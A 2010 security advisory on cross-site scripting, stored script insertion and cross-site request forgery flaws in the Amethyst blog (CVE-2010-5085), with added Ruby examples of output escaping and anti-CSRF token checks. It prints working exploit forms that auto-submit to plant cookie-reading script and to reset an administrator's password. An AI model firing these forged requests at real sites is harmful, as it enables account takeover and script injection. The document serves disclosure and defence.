HTB22499: Multiple Vulnerabilities in Amethyst

Advisory ID: HTB22499
Published: Jul 22, 2010
Author: High-Tech Bridge Security Research Lab (www.htbridge.com)
EPSS: 0.013 (Low), percentile 85.8%

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in Amethyst which could be exploited to perform cross-site scripting, script insertion and cross-site request forgery attacks. In all three cases the victim is a logged-in administrator: the XSS and CSRF payloads are delivered through cross-site forms that the administrator's browser submits, and the script inserted through comments fires when the administrator edits the comment.

  1. Cross-site scripting (XSS) vulnerability in Amethyst
    The vulnerability exists due to an input sanitization error in the "setting[site_title]" parameter of admin/update_settings. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website. Successful exploitation requires that the victim is logged in to the application and has access to the administrative interface. The payload closes the attribute the stored title is rendered into ("> ) and appends a <script> element; because the settings form is also submittable cross-site (see item 3), the example below plants it by auto-submitting a form from an attacker-controlled page rather than by typing it into the admin interface.
    Exploitation example:
    <form action="http://host/admin/update_settings" method="post" name="main" >
    <input type="hidden" name="setting[site_title]" value='My blog"><script>alert(document.cookie)</script>' />
    <input type="hidden" name="setting[site_description]" value="Welcome to My Amethyst Blog!" />
    <input type="hidden" name="setting[site_keywords]" value="amethyst blog, xss" />
    <input type="hidden" name="setting[enable_site_title]" value="1" />
    <input type="hidden" name="setting[posts_per_page]" value="10" />
    <input type="hidden" name="setting[archive_months_to_show]" value="12" />
    <input type="hidden" name="setting[enable_menu_archive]" value="1" />
    <input type="hidden" name="setting[enable_menu_search]" value="1" />
    <input type="hidden" name="setting[enable_menu_tools]" value="0" />
    <input type="hidden" name="setting[enable_menu_other]" value="1" />
    <input type="hidden" name="setting[item_thumbnail_width]" value="100" />
    <input type="hidden" name="setting[item_thumbnail_height]" value="100" />
    <input type="hidden" name="setting[resize_item_images]" value="0" />
    <input type="hidden" name="setting[item_image_width]" value="500" />
    <input type="hidden" name="setting[item_image_height]" value="500" />
    <input type="hidden" name="commit" value="Update Settings" />
    </form>
    <script>
    document.main.submit();
    </script>

  2. Script insertion vulnerability in Amethyst
    Input passed to all fields of browse/create_comment is not properly sanitized before it is displayed to the administrator in the comment editing view. A remote attacker can submit a comment containing arbitrary HTML and script code, which is then stored and executed in the administrator's browser, in the context of the vulnerable website, when the site administrator modifies the comment. The trust boundary is the point of output, not the identity of the viewer: a value submitted by an anonymous visitor has to be escaped wherever it is rendered, including on admin-only screens.
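The following is an added illustration for items 1 and 2 and is not code from the advisory or from Amethyst itself. It assumes Amethyst is a Ruby application (an assumption based on the Rails-style parameter names such as post[created_at(1i)]), and the rendering functions, markup and comment field name are hypothetical. It shows why the advisory's site_title payload works when the stored value is interpolated into an attribute unescaped, and how HTML-escaping every untrusted value on output (here with ERB::Util.html_escape from the Ruby standard library) neutralizes both the settings and the comment vector.

```ruby
require "erb"

# Constructed payload, identical to the advisory's setting[site_title] example.
XSS_TITLE = %q{My blog"><script>alert(document.cookie)</script>}

# Hypothetical vulnerable view: the stored title is dropped straight into an
# attribute value, so the attacker's `">` closes the <input> and the <script>
# that follows is parsed as live markup.
def render_site_title_unescaped(title)
  %(<input type="text" name="setting[site_title]" value="#{title}" />)
end

# Hardened view: every untrusted value is escaped on output.
# html_escape maps " to &quot;, < to &lt;, > to &gt;, & to &amp;, ' to &#39;.
def render_site_title_escaped(title)
  %(<input type="text" name="setting[site_title]" value="#{ERB::Util.html_escape(title)}" />)
end

# Same rule for the comment fields of item 2: the admin edit screen must escape
# the stored body before placing it in the page, even though a "trusted"
# administrator is the one viewing it. The field name comment[body] is assumed.
def render_comment_for_edit(body)
  %(<textarea name="comment[body]">#{ERB::Util.html_escape(body)}</textarea>)
end

# Crude reviewer check over rendered output: does a literal <script> tag that
# came from untrusted input survive? Not a general XSS detector, but enough to
# show the difference between the two renderings above.
def script_tag_survives?(html)
  html.include?("<script>")
end

if __FILE__ == $PROGRAM_NAME
  puts render_site_title_unescaped(XSS_TITLE)
  puts render_site_title_escaped(XSS_TITLE)
  puts render_comment_for_edit("nice post</textarea><script>alert(1)</script>")
end
```

Escaping at the point of output is the fix the advisory's wording ("not properly sanitized") points at; stripping tags on input is weaker, because the same stored value is usually rendered in more than one context (attribute, element body, JavaScript string) and each needs its own escaping rule.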

  3. Cross-site request forgery (CSRF) vulnerabilities in Amethyst: CVE-2010-5085
    3.1 The vulnerability exists due to insufficient validation of the request origin in admin/update_user/. A remote attacker can create a specially crafted page, trick a logged-in administrator into visiting it and change the administrator's credentials; the example below resets both the username and the password to attacker-chosen values, which hands the attacker the account.
    Exploitation example:
    <form action="http://host/admin/update_user/1" method="post" name="main" >
    <input type="hidden" name="user[username]" value="admin" />
    <input type="hidden" name="user[first_name]" value="First Name" />
    <input type="hidden" name="user[last_name]" value="Last Name" />
    <input type="hidden" name="user[password]" value="1234" />
    <input type="hidden" name="user[password_confirmation]" value="1234" />
    <input type="hidden" name="commit" value="Update" />
    </form>
    <script>
    document.main.submit();
    </script>
    3.2 The vulnerability exists due to insufficient validation of the request origin in admin/update. A remote attacker can create a specially crafted page, trick a logged-in administrator into visiting it and create a new publication. The example below reuses the script payload from item 1 in post[title], so a single forged request both publishes attacker-controlled content and plants the stored script.
    Exploitation example:
    <form action="http://host/admin/update/2" method="post" name="main" >
    <input type="hidden" name="post[title]" value='title"><script>alert(document.cookie)</script>' />
    <input type="hidden" name="post[content]" value="this is my post" />
    <input type="hidden" name="post[created_at(1i)]" value="2010" />
    <input type="hidden" name="post[created_at(2i)]" value="7" />
    <input type="hidden" name="post[created_at(3i)]" value="15" />
    <input type="hidden" name="post[created_at(4i)]" value="20" />
    <input type="hidden" name="post[created_at(5i)]" value="39" />
    <input type="hidden" name="post[updated_at(1i)]" value="2010" />
    <input type="hidden" name="post[updated_at(2i)]" value="7" />
    <input type="hidden" name="post[updated_at(3i)]" value="15" />
    <input type="hidden" name="post[updated_at(4i)]" value="20" />
    <input type="hidden" name="post[updated_at(5i)]" value="39" />
    <input type="hidden" name="commit" value="Create" />
    </form>
    <script>
    document.main.submit();
    </script>
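The following is an added illustration for item 3 and is not code from the advisory or from Amethyst. It assumes Amethyst is a Ruby application (an assumption based on the Rails-style parameter names), and the Request structure, handler name, origin and session layout are hypothetical. It simulates the admin/update_user/1 forgery above against a handler with no origin or token check, then against one that requires a per-session anti-CSRF token compared in constant time and rejects a foreign Origin as defence in depth. The key point is that the browser attaches the administrator's session cookie to the forged POST just as it does to a legitimate one, so the cookie alone cannot tell the two apart; only a secret the attacker's page cannot read (the token) or a header it cannot forge (Origin) can.

```ruby
require "securerandom"

# Constant-time comparison so the token check does not leak by timing.
def secure_equal?(a, b)
  return false if a.nil? || b.nil? || a.bytesize != b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# Hypothetical request: HTTP method, headers, form params, and the server-side
# session that the browser's cookie resolved to. The forged request carries the
# same session because the browser sends the cookie regardless of page origin.
Request = Struct.new(:method, :headers, :params, :session, keyword_init: true)

SITE_ORIGIN = "http://host" # assumed deployment origin, as in the advisory

def issue_csrf_token(session)
  session[:csrf_token] ||= SecureRandom.hex(32)
end

# Vulnerable handler, as the advisory describes: any POST with a valid session
# cookie is honoured, whoever built the form.
def update_user_vulnerable(req)
  req.session[:user] = req.params["user"]
  [200, "updated"]
end

# Returns :ok or a rejection reason. Origin/Referer is checked first when
# present; the per-session token is the check that works even when browsers
# or proxies strip those headers.
def csrf_check(req)
  return :ok if %w[GET HEAD OPTIONS].include?(req.method)
  origin = req.headers["Origin"] || req.headers["Referer"]
  return :bad_origin if origin && !origin.start_with?(SITE_ORIGIN)
  expected = req.session[:csrf_token]
  return :missing_token unless expected
  secure_equal?(req.params["authenticity_token"], expected) ? :ok : :bad_token
end

def update_user_hardened(req)
  verdict = csrf_check(req)
  return [403, "rejected: #{verdict}"] unless verdict == :ok
  update_user_vulnerable(req)
end

# Constructed scenario: the administrator has a live session; the attacker's
# page auto-submits the advisory's form from http://attacker.example.
def demo
  session = { user: { "username" => "admin", "password" => "secret" } }
  token = issue_csrf_token(session)
  forged_params = { "user" => { "username" => "admin", "password" => "1234",
                                "password_confirmation" => "1234" },
                    "commit" => "Update" }
  forged = Request.new(method: "POST", headers: { "Origin" => "http://attacker.example" },
                       params: forged_params, session: session)
  # Same forgery with Origin/Referer absent (stripped by a proxy or privacy tool).
  forged_no_origin = Request.new(method: "POST", headers: {},
                                 params: forged_params, session: session)
  legit = Request.new(method: "POST", headers: { "Origin" => SITE_ORIGIN },
                      params: { "user" => { "username" => "admin", "password" => "longer-secret",
                                            "password_confirmation" => "longer-secret" },
                                "authenticity_token" => token, "commit" => "Update" },
                      session: session)
  vulnerable_session = { user: session[:user].dup }
  vulnerable = update_user_vulnerable(
    Request.new(method: "POST", headers: {}, params: forged_params, session: vulnerable_session))
  {
    vulnerable: vulnerable, vulnerable_password: vulnerable_session[:user]["password"],
    forged: update_user_hardened(forged),
    forged_no_origin: update_user_hardened(forged_no_origin),
    legit: update_user_hardened(legit),
    final_password: session[:user]["password"]
  }
end

puts demo.inspect if __FILE__ == $PROGRAM_NAME
```

The token must be tied to the session and embedded in the legitimate form by the server; a value the attacker's page could compute or fetch (a static string, the session ID itself when it is readable cross-site) gives no protection. Rails applications get this check from protect_from_forgery, which the parameter names in the advisory suggest Amethyst did not enable on these controllers (an inference, not a statement from the advisory).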

Affected products (CPE)
Name      Operator  Version
amethyst  <=        0.1.5
